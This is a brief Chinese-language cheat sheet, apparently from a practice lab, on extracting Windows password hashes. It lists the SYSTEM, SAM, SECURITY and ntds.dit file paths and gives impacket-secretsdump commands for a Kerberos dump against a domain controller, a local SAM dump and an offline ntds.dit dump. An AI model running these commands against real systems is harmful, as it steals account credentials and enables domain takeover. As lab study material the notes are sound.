导出需要 SYSTEM 文件加一个你希望导出的注册表文件
SYSTEM 文件是必需的:它包含解密其他文件所需的 bootkey
注册表文件位置
C:\Windows\System32\config\SYSTEM #系统注册表配置 必需
C:\Windows\System32\config\SAM #安全账户管理器 本地账号密码
C:\Windows\System32\config\SECURITY #安全策略配置 包含系统级 DPAPI
C:\Windows\NTDS\ntds.dit # 域控数据库 (仅在DC上有)
BOOTKEY 不是独立的文件,是从SYSTEM中提取的
#kerberos
impacket-secretsdump -dc-ip 10.129.130.206 -k -no-pass DC.redelegate.vl -just-dc-user administrator
#SAM
impacket-secretsdump -sam SAM -system system local
#ntds.dit
impacket-secretsdump -ntds ntds.dit -system system local